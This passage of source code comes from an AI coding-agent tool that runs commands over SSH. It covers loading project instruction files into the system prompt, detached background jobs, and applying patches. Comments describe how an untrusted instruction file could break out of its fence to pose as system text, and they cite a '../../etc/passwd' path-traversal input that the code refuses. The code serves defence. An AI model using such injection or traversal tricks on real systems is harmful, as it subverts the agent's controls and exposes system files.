runs on the request path, so an SFTP round trip from there would hold a
request open while somebody's box thought about it. The build happens in
`generation._warm_project`, which is async and already doing network work.
* **`ensure()` shares one build between concurrent callers**, via `_BUILDING`
and `asyncio.shield`.
* **Each name catches its own `ExecError`.** This is the ladder lesson from
`index.py` arriving before the bug does: an `AGENTS.md` that cannot be read --
a permission, an SFTP-only account, a directory where a file was expected --
must not stop `CLAUDE.md` being tried.
The contents are **untrusted**, and go into the *system* message of a chat that
can run commands. Nothing here can fix that; what does is the wording of the
`context.agent_instructions` fragment, which names where the file came from and
bounds what it is allowed to do. Two things are done here: control characters
are stripped, and backticks are neutralised so the file cannot close the fence
it is put inside and start writing what looks like our own prose.
"""
from __future__ import annotations
import asyncio
import logging
import posixpath
import re
import time
from dataclasses import dataclass
from lembas.services.agent.base import ExecError, Executor
log = logging.getLogger(__name__)
# In order. AGENTS.md first because it is the vendor-neutral convention a shared
# repository is likeliest to carry; CLAUDE.md next because it is the one most
# widely written in practice. Root only, no recursion: a per-directory
# convention is a different feature with a different cost model.
NAMES = ("AGENTS.md", "CLAUDE.md", "AGENT.md", ".agents.md")
TTL = 300.0
MAX_CACHED = 64
# The default ceiling on what reaches the prompt. The admin setting wins.
MAX_CHARS = 4000
_CONTROL = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]")
@dataclass(frozen=True)
class Instructions:
"""What was found in the project root, and where."""
filename: str = ""
text: str = ""
built_at: float = 0.0
@property
def ok(self) -> bool:
return bool(self.filename and self.text.strip())
def clean(raw: str) -> str:
"""Made safe to put inside a fenced block in a system message."""
text = _CONTROL.sub("", raw).replace("\r\n", "\n").replace("\r", "\n")
# It must not be able to close our fence and carry on in what then reads as
# our own voice. Replaced rather than escaped: this is a display of somebody
# else's file, not a round trip.
return text.replace("```", "'''")
async def build(executor: Executor, budget: int = MAX_CHARS) -> Instructions:
"""Look for each name in turn, and stop at the first one that reads."""
for name in NAMES:
try:
# Four bytes a character is generous for UTF-8 prose and stops a
# two-megabyte file being pulled across to be thrown away.
raw = await executor.read_file(name, max_bytes=max(budget, 1) * 4)
except ExecError:
# Its own catch, per name. A rung that raises must not end the
# ladder -- that bug has already been paid for once in index.py.
continue
except Exception: # noqa: BLE001 - a warm-up must never kill a reply
log.debug("could not read %s", name, exc_info=True)
continue
text = clean(raw)
if text.strip():
return Instructions(filename=name, text=text, built_at=time.monotonic())
return Instructions(built_at=time.monotonic())
# --- The cache ---------------------------------------------------------------
# Keyed on the connection and the directory, exactly as the listing is: two
# chats on one tree are looking at the same file.
_CACHE: dict[tuple[str, str], Instructions] = {}
_BUILDING: dict[tuple[str, str], asyncio.Task] = {}
def cached(profile_id: str, project_dir: str) -> Instructions | None:
"""What is already known, or None. Never does any work.
A miss is not "there is no file" -- it is "nobody has looked yet", and the
fragment's `requires` turns both into the same thing: no section at all.
"""
found = _CACHE.get((profile_id, project_dir))
if found is None:
return None
if time.monotonic() - found.built_at > TTL:
_CACHE.pop((profile_id, project_dir), None)
return None
return found
async def ensure(
executor: Executor,
profile_id: str,
project_dir: str,
*,
budget: int = MAX_CHARS,
refresh: bool = False,
) -> Instructions:
key = (profile_id, project_dir)
if refresh:
_CACHE.pop(key, None)
elif (found := cached(profile_id, project_dir)) is not None:
return found
if (running := _BUILDING.get(key)) is not None:
return await asyncio.shield(running)
task = asyncio.create_task(build(executor, budget))
_BUILDING[key] = task
try:
found = await task
finally:
_BUILDING.pop(key, None)
_CACHE[key] = found
while len(_CACHE) > MAX_CACHED:
_CACHE.pop(next(iter(_CACHE)))
return found
def is_instruction_file(path: str, project_dir: str) -> bool:
"""Whether a written path is the file this module caches.
Resolved against the project directory rather than matched on the basename,
so `./AGENTS.md`, `AGENTS.md` and `/work/AGENTS.md` are all it and
`docs/AGENTS.md` is not -- root only, the same rule `build` follows. A
basename match would drop the cache every time any subdirectory's own
AGENTS.md was touched, which is a fetch nobody asked for.
"""
wanted = path.strip()
if not wanted:
return False
if not posixpath.isabs(wanted) and project_dir:
wanted = posixpath.join(project_dir, wanted)
wanted = posixpath.normpath(wanted)
return any(
wanted == posixpath.normpath(posixpath.join(project_dir or "", name)) for name in NAMES
)
def forget(profile_id: str, project_dir: str) -> None:
"""Drop it, because something just rewrote it.
The one case the TTL cannot cover: this process changing the file it has
just quoted. Unlike the directory listing, an *edit* counts here as much as
a write -- the listing only cares that the file exists, this cares what is
in it.
"""
_CACHE.pop((profile_id, project_dir), None)
def clear() -> None:
_CACHE.clear()
def render(found: Instructions | None, budget: int) -> str:
"""The text, within the budget, cut at a line boundary."""
if found is None or not found.ok or budget <= 0:
return ""
text = found.text.strip()
if len(text) <= budget:
return text
cut = text[:budget]
at = cut.rfind("\n")
if at > budget // 2:
cut = cut[:at]
return f"{cut.rstrip()}\n… (truncated)"
__all__ = [
"MAX_CHARS",
"NAMES",
"TTL",
"Instructions",
"build",
"cached",
"clean",
"clear",
"ensure",
"forget",
"is_instruction_file",
"render",
]
-732
View File
@@ -1,732 +0,0 @@
"""Commands that outlive the reply that started them.
An ordinary `shell_run` is one blocking `conn.run` over a per-call connection
(`ssh.py`): when it hits its timeout the command is killed, so a ten-minute
`apt install` is impossible. A background job is the same command launched
*detached* on the far side -- `setsid`, redirected to a remote logfile and an
exit-file -- so it survives the connection closing. LLeMbas reconnects (a fresh
connection, as always) to read the log and the exit code later.
This is the opposite of `terminal.py`, which survives by *holding* a connection
open. Here we hold nothing: the whole point of `ssh.py`/`base.py` is that no live
connection is kept, and a job that needed one would be a job that broke that.
**The command never touches a quoted shell context.** `sh -c '<cmd>'` shatters
the instant the command contains a `'` -- `git commit -m 'fix'`, `awk '{}'`,
`sed 's/…/…/'` are the common case, not an edge one, and would also be an
injection hole. So the command is base64-encoded here in Python and decoded on
the far side into a script file; it is bytes, never shell syntax. Only
server-generated hex ids and a fixed root ever reach a path.
Three things make the wrappers correct, and each was got wrong in an earlier
sketch:
* **The child records its own pid via `$$`**, as its first act, under `setsid`
where it is the session/group leader -- so `job_stop` can `kill -<pid>` the
whole process group. `echo $!` from the launcher captures the wrong pid.
* **The exit-file is the primary signal.** An empty pid-file means "still
starting", not "dead"; reading liveness first would race the launch and report
a job lost the instant it began.
* **The command's exit status comes from the exit-file, never from the wrapper's
own status** -- which is ~0 from the trailing `rm`. Reading the wrapper's
status would mark every job a success.
"""
from __future__ import annotations
import asyncio
import base64
import contextlib
import logging
import re
import time
import uuid
from dataclasses import dataclass, field
from datetime import UTC, datetime
from typing import Any
from sqlalchemy import select
from lembas.services.agent.base import ExecError, ExecRequest, clean_output
log = logging.getLogger(__name__)
# Where a job's files live on the far side. `${TMPDIR:-/tmp}` so a host that
# puts scratch space elsewhere is honoured, and it clears on reboot -- a job
# does not survive a reboot of its own host either. The chat id namespaces it,
# which is also what makes cross-chat access structurally impossible: a path is
# only ever built from the *calling* chat's id, so a model in one chat cannot
# name another chat's files.
JOB_ROOT = "${TMPDIR:-/tmp}/lembas-jobs"
# A job id is our own short hex; anything else is refused before it reaches a
# path, so `job_output("../../etc/passwd")` cannot walk out of the job root.
_ID = re.compile(r"^[a-f0-9]{12}$")
# How long the fire-and-return launcher waits for the shell to accept the
# command. Not the command's own timeout -- it returns the moment the process is
# detached, which is immediate.
LAUNCH_GRACE = 10.0
# The working set, keyed by job id: what `job_list` shows this session. Mirrored
# to a `Job` row for jobs that are watched, so a restart can rehydrate them.
_JOBS: dict[str, JobState] = {}
# One watcher task per job being polled to completion.
_WATCHERS: dict[str, asyncio.Task] = {}
# Stop watching a job after this. The remote process may keep running; we simply
# stop holding a watcher for it and mark it lost. A job that runs longer than
# this is beyond what auto-wake promises.
MAX_WATCH_SECONDS = 6 * 3600
# How much of a finished job's output is put in front of the model when it is
# woken. Capped so a job that printed a gigabyte does not blow the window.
MAX_COMPLETION_CHARS = 4000
def new_id() -> str:
return uuid.uuid4().hex[:12]
@dataclass
class JobState:
"""What LLeMbas remembers about one background job, in this process."""
id: str
chat_id: str
command: str
status: str = "running" # running | done | killed | lost
exit_status: int | None = None
started_at: float = field(default_factory=time.monotonic)
finished_at: float = 0.0
# --- Paths and the wrappers ----------------------------------------------------
def _dir(chat_id: str) -> str:
return f'"{JOB_ROOT}/{chat_id}"'
def _file(chat_id: str, job_id: str, ext: str) -> str:
# Double-quoted so `${TMPDIR:-/tmp}` still expands while the whole path stays
# one word. The chat id and job id are hex, so nothing here needs escaping.
return f'"{JOB_ROOT}/{chat_id}/{job_id}.{ext}"'
def _sentinel(job_id: str) -> str:
return f"__LEMBAS_{job_id}__"
def _inner_script(chat_id: str, job_id: str, command: str) -> str:
"""The detached program: record the pid, run the command, record the status.
base64-encoded before it leaves, so `command` is bytes and never shell
syntax. `$$` first, because it is the session leader's pid under setsid and
`job_stop` kills the group by it. `$?` last, capturing the command's status;
it is the file `run`'s own exit status must never be read in place of.
"""
return (
f"echo $$ > {_file(chat_id, job_id, 'pid')}\n"
f"{command}\n"
f"echo $? > {_file(chat_id, job_id, 'exit')}\n"
)
def _blob(chat_id: str, job_id: str, command: str) -> str:
raw = _inner_script(chat_id, job_id, command).encode("utf-8")
return base64.b64encode(raw).decode("ascii")
def _launch_lines(chat_id: str, job_id: str, command: str) -> str:
"""Create the job dir, drop the script, and detach it. No wait."""
blob = _blob(chat_id, job_id, command)
return (
f"mkdir -p {_dir(chat_id)} 2>/dev/null\n"
f"printf %s '{blob}' | base64 -d > {_file(chat_id, job_id, 'sh')}\n"
f"setsid sh {_file(chat_id, job_id, 'sh')} "
f"> {_file(chat_id, job_id, 'log')} 2>&1 < /dev/null &\n"
)
def launch_command(chat_id: str, job_id: str, command: str) -> str:
"""Fire-and-return: detach the command and stop. Run with a short timeout."""
return _launch_lines(chat_id, job_id, command) + "printf started\n"
def launch_and_wait_command(chat_id: str, job_id: str, command: str, max_bytes: int) -> str:
"""Detach the command AND wait up to the (asyncssh) timeout for it.
If it finishes, stdout is the log tail plus a sentinel line carrying the exit
code, and the files are removed. If asyncssh times out first the channel is
torn down before the `rm`, so the files survive for a later read and the
detached process -- new session, redirected, stdin from /dev/null -- keeps
running. That torn-down-mid-wait case is exactly "it became a background
job".
"""
s = _sentinel(job_id)
pid = _file(chat_id, job_id, "pid")
exit_ = _file(chat_id, job_id, "exit")
logf = _file(chat_id, job_id, "log")
return (
_launch_lines(chat_id, job_id, command)
+ "while :; do\n"
f" [ -f {exit_} ] && break\n"
f" __p=$(cat {pid} 2>/dev/null)\n"
' [ -n "$__p" ] && ! kill -0 "$__p" 2>/dev/null && break\n'
# 0.2s: with the feature on, every ordinary command waits one poll for
# the exit-file, so this is added latency on the hot path. Short enough
# not to be felt, long enough not to spin.
" sleep 0.2\n"
"done\n"
f"tail -c {max_bytes} {logf} 2>/dev/null\n"
f"printf '\\n{s}:'\n"
f"cat {exit_} 2>/dev/null || printf LOST\n"
# `logf`, not `log`. The module logger is a perfectly good f-string
# operand and formats to "<Logger … (WARNING)>", whose angle brackets and
# parentheses are shell syntax -- so this line died with a syntax error,
# after the sentinel where nothing reads it, and every job's four files
# were left on the far side forever. See the note in the working notes.
f"rm -f {_file(chat_id, job_id, 'sh')} {pid} {logf} {exit_}\n"
)
def read_command(chat_id: str, job_id: str, max_bytes: int) -> str:
"""The log so far, and whether the job is still running."""
s = _sentinel(job_id)
pid = _file(chat_id, job_id, "pid")
exit_ = _file(chat_id, job_id, "exit")
return (
f"tail -c {max_bytes} {_file(chat_id, job_id, 'log')} 2>/dev/null\n"
f"printf '\\n{s}:'\n"
f"if [ -f {exit_} ]; then printf 'done '; cat {exit_};\n"
f'elif __p=$(cat {pid} 2>/dev/null); [ -n "$__p" ] && kill -0 "$__p" 2>/dev/null;'
" then printf running;\n"
"else printf lost; fi\n"
)
def stop_command(chat_id: str, job_id: str) -> str:
"""Kill the whole process group, then record an exit so a reader is not told
the job is merely lost. A killed process never writes its own exit file."""
pid = _file(chat_id, job_id, "pid")
exit_ = _file(chat_id, job_id, "exit")
return (
f'__p=$(cat {pid} 2>/dev/null); [ -n "$__p" ] && kill -TERM -"$__p" 2>/dev/null\n'
"sleep 0.3\n"
f'[ -n "$__p" ] && kill -KILL -"$__p" 2>/dev/null\n'
f"[ -f {exit_} ] || echo 143 > {exit_}\n"
"printf stopped\n"
)
def cleanup_command(chat_id: str, job_id: str) -> str:
return (
f"rm -f {_file(chat_id, job_id, 'sh')} {_file(chat_id, job_id, 'pid')} "
f"{_file(chat_id, job_id, 'log')} {_file(chat_id, job_id, 'exit')}\n"
)
# --- Parsing what a wrapper printed --------------------------------------------
@dataclass(frozen=True)
class Completed:
body: str
exit_status: int | None # None ⇒ the job was lost (killed without an exit)
def parse_completed(output: str, job_id: str) -> Completed:
"""Split a launch-and-wait result into the command's output and its status.
On the *last* sentinel, because the command's own output could contain a
line that looks like one; everything before it is the body, everything after
is the exit code the file held.
"""
marker = f"\n{_sentinel(job_id)}:"
at = output.rfind(marker)
if at == -1:
return Completed(body=output.strip(), exit_status=None)
body = output[:at].strip()
tail = output[at + len(marker) :].strip()
if tail.upper() == "LOST" or not tail:
return Completed(body=body, exit_status=None)
try:
return Completed(body=body, exit_status=int(tail.split()[0]))
except (ValueError, IndexError):
return Completed(body=body, exit_status=None)
@dataclass(frozen=True)
class Reading:
body: str
status: str # running | done | lost
exit_status: int | None
def parse_reading(output: str, job_id: str) -> Reading:
marker = f"\n{_sentinel(job_id)}:"
at = output.rfind(marker)
if at == -1:
return Reading(body=output.strip(), status="lost", exit_status=None)
body = output[:at].strip()
tail = output[at + len(marker) :].strip()
if tail.startswith("done"):
parts = tail.split()
code = int(parts[1]) if len(parts) > 1 and parts[1].lstrip("-").isdigit() else None
return Reading(body=body, status="done", exit_status=code)
if tail == "running":
return Reading(body=body, status="running", exit_status=None)
return Reading(body=body, status="lost", exit_status=None)
# --- Operations against the machine --------------------------------------------
async def launch(agent, command: str, cwd: str = "") -> JobState:
"""Detach a command and return immediately. Raises ExecError if it will not
even start."""
job_id = new_id()
result = await agent.executor().run(
ExecRequest(
command=launch_command(agent.chat_id, job_id, command),
cwd=cwd,
timeout=LAUNCH_GRACE,
max_bytes=agent.max_output,
)
)
if result.timed_out:
raise ExecError("The machine did not accept the command in time.")
job = JobState(id=job_id, chat_id=agent.chat_id, command=command)
_JOBS[job_id] = job
return job
async def read(agent, job_id: str) -> Reading:
output, _ = _clean(
await agent.executor().run(
ExecRequest(
command=read_command(agent.chat_id, job_id, agent.max_output),
timeout=agent.timeout,
max_bytes=agent.max_output,
)
),
agent.max_output,
)
reading = parse_reading(output, job_id)
_record(job_id, reading.status, reading.exit_status)
if reading.status in ("done", "lost"):
await _cleanup(agent, job_id)
return reading
async def stop(agent, job_id: str) -> None:
await agent.executor().run(
ExecRequest(command=stop_command(agent.chat_id, job_id), timeout=agent.timeout)
)
_record(job_id, "killed", 143)
async def _cleanup(agent, job_id: str) -> None:
with contextlib.suppress(ExecError):
await agent.executor().run(
ExecRequest(command=cleanup_command(agent.chat_id, job_id), timeout=agent.timeout)
)
def _clean(result, limit: int) -> tuple[str, bool]:
if result.timed_out:
return result.output, False
return clean_output(result.output or "", limit=limit)
# --- The registry --------------------------------------------------------------
def register(job: JobState) -> None:
_JOBS[job.id] = job
def get(job_id: str) -> JobState | None:
return _JOBS.get(job_id)
def for_chat(chat_id: str) -> list[JobState]:
return [j for j in _JOBS.values() if j.chat_id == chat_id]
def valid_id(job_id: str) -> bool:
return bool(_ID.match(job_id or ""))
@dataclass(frozen=True)
class JobView:
"""One job as a person sees it, rather than as the watcher tracks it.
Two sources, because neither is complete on its own. The `agent_jobs` row is
what survives a restart and carries wall-clock times; `JobState` is what this
process knows now, and it exists for a job whose row could not be written --
`_persist_row` is best-effort by design, so a job with no row is still a job
that is running.
Times are wall clock, from the row. `JobState.started_at` is
`time.monotonic()`, which is right for measuring an interval inside one
process and meaningless across a restart: `rehydrate` builds a fresh
`JobState` whose clock starts at nought, so a job that had been running for
three hours would report having started a moment ago.
"""
id: str
command: str
status: str
exit_status: int | None = None
started_at: Any = None
finished_at: Any = None
@property
def running(self) -> bool:
return self.status == "running"
@property
def tone(self) -> str:
"""What colour this job is, which is not the question `status` answers.
`done` is two outcomes. The row beside the dot already tells them apart
in words -- "Finished" against "Failed, exit 2" -- so a dot keyed on the
status would be green next to a sentence saying the opposite.
The *wording* stays in the template's if-chain rather than moving here
beside the colour. Authored text belongs in the file somebody reads to
change it, and saving one branch is not worth taking five phrases out of
it; this is the half that cannot be said in a class name.
"""
if self.running:
return "running"
if self.status != "done":
return self.status # killed, lost
return "ok" if not self.exit_status else "failed"
@property
def duration(self) -> str:
"""How long it took, once it is over. Empty while it is still running.
Empty on purpose rather than for want of an answer. This panel is
fetched when somebody opens it and is never polled -- the chip beside
the composer is what refreshes on a timer -- so a live "running for
2m 05s" would be stale the instant it painted and stay stale until the
reader pressed something. The chip says something is still going; this
says how long the finished ones took, which is true forever.
Both stamps are normalised before subtracting, for the reason
`compaction.moment` normalises: SQLite stores no offset, so a row read
back from disk is naive while one still in the session's identity map
keeps its tzinfo, and subtracting one from the other raises. `moment`
itself is not reused because it takes a `Message`, not a stamp.
"""
if self.running or self.started_at is None or self.finished_at is None:
return ""
seconds = (_aware(self.finished_at) - _aware(self.started_at)).total_seconds()
return _short_duration(seconds) if seconds >= 0 else ""
def _aware(stamp: datetime) -> datetime:
"""A stamp that can be subtracted from another. See `JobView.duration`."""
return stamp if stamp.tzinfo is not None else stamp.replace(tzinfo=UTC)
def _short_duration(seconds: float) -> str:
"""A wall-clock span, at the precision somebody reading a log cares about.
Deliberately not `steps._short_duration`. That one takes milliseconds, tops
out at minutes and is tuned to a label repainting beside an animating word;
a three-hour build through it reads `184m 12s`. This one is written for a
span that can be hours and is only ever rendered once it is final.
"""
total = int(seconds)
if total < 60:
return f"{total}s"
if total < 3600:
return f"{total // 60}m {total % 60:02d}s"
return f"{total // 3600}h {(total % 3600) // 60:02d}m"
def listing(db, chat_id: str) -> list[JobView]:
"""Every job this chat has, newest first.
Live state wins over the stored row where they disagree. They should not --
`_record` writes the row as it updates the state -- but the row write is the
half allowed to fail, so preferring the fresher of the two is what keeps a
finished job from being shown as running for ever.
"""
from lembas.db.models import Job
live = {job.id: job for job in for_chat(chat_id)}
views: list[JobView] = []
seen: set[str] = set()
rows = db.scalars(
select(Job).where(Job.chat_id == chat_id).order_by(Job.created_at.desc())
)
for row in rows:
state = live.get(row.id)
seen.add(row.id)
views.append(
JobView(
id=row.id,
command=row.command or "",
status=state.status if state is not None else row.status,
exit_status=state.exit_status if state is not None else row.exit_status,
started_at=row.created_at,
finished_at=row.finished_at,
)
)
# A job whose row never got written. It has no start time to show, which is
# honest: nothing recorded one.
for job in live.values():
if job.id not in seen:
views.insert(
0,
JobView(
id=job.id,
command=job.command,
status=job.status,
exit_status=job.exit_status,
),
)
return views
def running_count(db, chat_id: str) -> int:
return sum(1 for view in listing(db, chat_id) if view.running)
def _record(job_id: str, status: str, exit_status: int | None) -> None:
job = _JOBS.get(job_id)
if job is None or job.status != "running":
return
if status in ("done", "lost", "killed"):
job.status = status
job.exit_status = exit_status
job.finished_at = time.monotonic()
_persist_row(job)
def clear() -> None:
_JOBS.clear()
# --- Durable record ------------------------------------------------------------
# Best-effort throughout: a job whose row cannot be written (a test with no real
# chat, a transient database hiccup) still runs and is still tracked in-process;
# it just will not survive a restart, which is the row's only purpose.
def _persist_row(job: JobState) -> None:
from lembas.db.models import Job
from lembas.db.session import session_scope
try:
with session_scope() as db:
row = db.get(Job, job.id)
if row is None:
row = Job(id=job.id, chat_id=job.chat_id)
db.add(row)
row.command = job.command[:4000]
row.status = job.status
row.exit_status = job.exit_status
row.finished_at = None if job.status == "running" else datetime.now(UTC)
except Exception: # noqa: BLE001 - the row is a convenience, not the job
log.debug("could not persist job %s", job.id, exc_info=True)
# --- The watcher ---------------------------------------------------------------
def _poll_interval(elapsed: float) -> float:
if elapsed < 30:
return 3.0
if elapsed < 300:
return 10.0
return 25.0
def start_watch(agent, job: JobState) -> None:
"""Poll a job to completion and, when it finishes, wake the model.
Only when notify is on -- the watcher's whole job is the wake and the status
update, and without notify the model reads `job_output` itself, which
updates the status anyway. Capped by `background_max_jobs`: past it a job
still runs and can be read, it simply is not watched.
The credential is copied, not referenced: `generation` clears the agent's
`spec` when the reply ends, and the watcher outlives the reply. Holding the
copy for the job's life is the same trade the terminal makes for a held
shell.
"""
_persist_row(job)
if not agent.background_notify or len(_WATCHERS) >= agent.background_max_jobs:
return
task = asyncio.create_task(
_watch(
dict(agent.spec),
agent.project_dir,
job.chat_id,
job.id,
job.command,
agent.max_output,
)
)
_WATCHERS[job.id] = task
async def _watch(
spec: dict, project_dir: str, chat_id: str, job_id: str, command: str, max_output: int
) -> None:
from lembas.services.agent.ssh import SshExecutor
started = time.monotonic()
try:
while True:
await asyncio.sleep(_poll_interval(time.monotonic() - started))
if time.monotonic() - started > MAX_WATCH_SECONDS:
_record(job_id, "lost", None)
return
try:
result = await SshExecutor(spec, project_dir).run(
ExecRequest(
command=read_command(chat_id, job_id, max_output),
timeout=30,
max_bytes=max_output,
)
)
except ExecError:
continue # transient -- the host is briefly unreachable; retry
if result.timed_out:
continue
output, _ = clean_output(result.output or "", limit=max_output)
reading = parse_reading(output, job_id)
if reading.status in ("done", "lost"):
_record(job_id, reading.status, reading.exit_status)
with contextlib.suppress(ExecError):
await SshExecutor(spec, project_dir).run(
ExecRequest(command=cleanup_command(chat_id, job_id), timeout=30)
)
await wake(chat_id, job_id, command, reading.status, reading.exit_status,
reading.body)
return
except asyncio.CancelledError:
raise
except Exception: # noqa: BLE001 - a watcher that dies must not take others
log.exception("job watcher for %s raised", job_id)
finally:
_WATCHERS.pop(job_id, None)
# --- Waking the model ----------------------------------------------------------
def _completion_text(
job_id: str, command: str, status: str, exit_status: int | None, output: str
) -> str:
if status == "done" and exit_status == 0:
line = "It finished successfully."
elif status == "done":
line = f"It exited {exit_status}."
else:
line = "It stopped without an exit status (it may have been killed)."
body = (output or "").strip()[:MAX_COMPLETION_CHARS]
# A fence for the model's benefit; backticks in the output are neutralised so
# they cannot close it, the same move `instructions.clean` makes.
fenced = f"\n\n```\n{body.replace('```', chr(39) * 3)}\n```" if body else ""
return (
f"A background job you started has finished — this is a machine event, "
f"not the person speaking.\n\n"
f"[job {job_id}] `{command}`\n{line}{fenced}"
)
async def wake(
chat_id: str, job_id: str, command: str, status: str, exit_status: int | None, output: str
) -> None:
"""Tell the model a job finished, as a new turn.
Reuses the queue: if a reply is being written, the completion is left
`queued` for that reply's `_inject`/`_drain` to deliver; if the chat is idle,
a fresh reply is started to answer it, the `send_queued_now` move.
The lock discipline that makes that safe lives in `services/wake.py`, which
is the one copy of it -- schedules need the identical rule, and two lock
dictionaries for one invariant is how one of them drifts. What stays here is
the *wording*, because `tool.background` quotes `_completion_text`'s opening
sentence to the model and rewording it would break that instruction with
nothing anywhere to notice.
"""
from lembas.services import wake as wake_service
await wake_service.wake_chat(
chat_id, _completion_text(job_id, command, status, exit_status, output)
)
# --- Rehydration and shutdown --------------------------------------------------
def rehydrate() -> None:
"""After a restart, watch again the jobs that were still running.
Their remote files are keyed deterministically on chat and id, so a fresh
watcher re-polls them and wakes the model as if nothing happened -- which is
the whole reason the row exists. Best-effort per job: a host that is down, a
profile that is gone, a chat that was deleted each just drop that one.
"""
from lembas.db.models import Chat, SshProfile
from lembas.db.session import session_scope
from lembas.services import settings_store
from lembas.services.agent import ssh as ssh_service
with session_scope() as db:
values = settings_store.agents(db)
if not values.get("enabled") or not values.get("background_notify"):
return
max_output = int(values.get("max_output_bytes") or 64 * 1024)
running = list(db.scalars(_running_rows()))
for row in running:
chat = db.get(Chat, row.chat_id)
if chat is None or not chat.ssh_profile_id:
continue
profile = db.get(SshProfile, chat.ssh_profile_id)
if profile is None or not profile.enabled:
continue
spec = ssh_service.spec_from(profile)
project_dir = chat.project_dir or profile.default_dir or ""
job = JobState(id=row.id, chat_id=row.chat_id, command=row.command)
_JOBS[job.id] = job
if len(_WATCHERS) >= int(values.get("background_max_jobs") or 5):
break
_WATCHERS[job.id] = asyncio.create_task(
_watch(spec, project_dir, row.chat_id, row.id, row.command, max_output)
)
def _running_rows():
from sqlalchemy import select
from lembas.db.models import Job
return select(Job).where(Job.status == "running")
async def shutdown() -> None:
"""Cancel every watcher. The detached remote jobs are unaffected -- they run
on, and a later start rehydrates them from their rows."""
tasks = list(_WATCHERS.values())
_WATCHERS.clear()
for task in tasks:
task.cancel()
for task in tasks:
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
__all__ = [
"JOB_ROOT",
"Completed",
"JobState",
"Reading",
"clear",
"for_chat",
"get",
"launch",
"launch_and_wait_command",
"new_id",
"parse_completed",
"read",
"register",
"stop",
"valid_id",
]
-313
View File
@@ -1,313 +0,0 @@
"""Applying a unified diff, and rendering one.
`difflib` produces a unified diff and cannot apply one, so `render` uses it and
`apply` is written here. No new dependency: hard rule 1 is about the browser,
but a patch applier is fifty lines and pulling a package in for it would be
worse than the fifty lines.
Four behaviours carry the whole module, and each of them exists because of how
models actually write patches rather than how the format is specified.
**Fuzzy offset, exact content.** A hunk's `@@ -41,7 +41,8 @@` is a hint and
nothing more. Models get line numbers wrong constantly -- they count from a
truncated read, or from the file as it was three edits ago -- and get the
context lines right. So the hinted position is tried first and then the file is
scanned outward for an exact match of the context block. One match wins; more
than one refuses, because guessing which of two identical blocks was meant is
the one failure that silently corrupts a file.
**Line endings are normalised in and restored out.** A CRLF file otherwise
fails on every single hunk, on context that looks identical in the error
message, which is unfixable from the model's side.
**A blank context line may have lost its leading space.** Trailing whitespace
is stripped by half the things a model's output passes through, so `""` is read
as a blank context line rather than as a malformed one.
**Nothing is written unless every hunk applies.** The new text is built whole in
memory and handed back; a half-applied file is worse than a refused one, and the
model cannot tell the difference without reading it again.
"""
from __future__ import annotations
import difflib
import re
from dataclasses import dataclass
# A patch bigger than this is a rewrite wearing a diff's clothes, and
# `file_write` is the tool for that.
MAX_HUNKS = 60
# How far either side of the hinted line to look for the context block. Wide
# enough for a file that has grown a few hundred lines since the model read it,
# narrow enough that an accidental match is unlikely.
MAX_DRIFT = 200
_HEADER = re.compile(r"^@@\s*-(\d+)(?:,(\d+))?\s+\+(\d+)(?:,(\d+))?\s*@@")
_NO_NEWLINE = "\\ No newline at end of file"
class PatchError(Exception):
"""A patch that did not apply, said precisely enough to retry from."""
def __init__(self, message: str, *, hunk: int = 0) -> None:
super().__init__(message)
self.message = message
self.hunk = hunk
@dataclass(frozen=True)
class Hunk:
old_start: int
old_count: int
new_start: int
new_count: int
# Each line still carrying its ' ', '+' or '-'.
lines: tuple[str, ...]
# A `\ No newline at end of file` marker followed a line this hunk *adds*,
# so the result is meant to end without one. Honoured only when the hunk
# actually reaches the end of the file -- git emits the marker for the old
# side too, and reading that as an instruction would strip a newline the
# patch never touched.
ends_without_newline: bool = False
@property
def before(self) -> tuple[str, ...]:
"""The lines this hunk expects to find, without their markers."""
return tuple(line[1:] for line in self.lines if line[:1] in (" ", "-"))
@property
def after(self) -> tuple[str, ...]:
return tuple(line[1:] for line in self.lines if line[:1] in (" ", "+"))
def parse(patch: str) -> list[Hunk]:
"""Read a unified diff into hunks.
File headers are tolerated and ignored -- `diff --git`, `index`, `---`,
`+++` -- because models emit them by habit and refusing would cost a round
trip to say so. The `@@` header is required: without one there is nothing to
anchor against, and the resulting error is at least mechanical to fix.
"""
hunks: list[Hunk] = []
state: dict = {"header": None, "body": [], "bare": False}
def flush() -> None:
if state["header"] is None:
return
hunks.append(
Hunk(
*state["header"],
lines=tuple(state["body"]),
ends_without_newline=state["bare"],
)
)
state["header"] = None
state["body"] = []
state["bare"] = False
body = (patch or "").replace("\r\n", "\n").replace("\r", "\n").split("\n")
# The patch's own final newline, not a blank context line. Without this every
# well-formed patch acquires one phantom line of context at the end and
# matches nothing -- which looks exactly like the model getting it wrong.
if body and body[-1] == "":
body.pop()
for raw in body:
matched = _HEADER.match(raw)
if matched:
flush()
state["header"] = (
int(matched.group(1)),
int(matched.group(2) or 1),
int(matched.group(3)),
int(matched.group(4) or 1),
)
continue
if state["header"] is None:
# Preamble. Anything before the first @@ is a file header we do not
# need: the path is a parameter, not something read out of the diff.
continue
if raw.startswith(_NO_NEWLINE):
# It describes whichever side the line above belonged to. Only the
# new side is an instruction; the old side is a description of the
# file we are about to read for ourselves.
if state["body"] and state["body"][-1][:1] in ("+", " "):
state["bare"] = True
continue
if raw[:1] in ("+", "-", " "):
state["body"].append(raw)
elif raw == "":
# A blank line that lost its leading space. Common enough to be the
# normal case rather than an exceptional one.
state["body"].append(" ")
else:
# A stray line inside a hunk -- a second `diff --git`, a signature.
# Ends the hunk rather than corrupting it.
flush()
flush()
if not hunks:
raise PatchError(
"That patch has no hunks. A patch needs at least one "
"`@@ -old,count +new,count @@` header, followed by the lines to "
"change: ' ' for context, '-' to remove, '+' to add."
)
if len(hunks) > MAX_HUNKS:
raise PatchError(
f"That patch has {len(hunks)} hunks, and {MAX_HUNKS} is the most "
f"that will be applied at once. Rewrite the file with file_write "
f"instead, or send the change in pieces."
)
return hunks
def _find(lines: list[str], wanted: tuple[str, ...], hint: int, floor: int) -> int:
"""Where `wanted` sits in `lines`, at or after `floor`. Raises if unclear."""
if not wanted:
# A pure insertion has no context to match. The hint is all there is.
return max(floor, min(hint, len(lines)))
span = len(wanted)
if hint >= floor and lines[hint : hint + span] == list(wanted):
return hint
matches = [
at
for at in range(max(floor, hint - MAX_DRIFT), min(len(lines) - span, hint + MAX_DRIFT) + 1)
if lines[at : at + span] == list(wanted)
]
if len(matches) == 1:
return matches[0]
if len(matches) > 1:
raise PatchError(
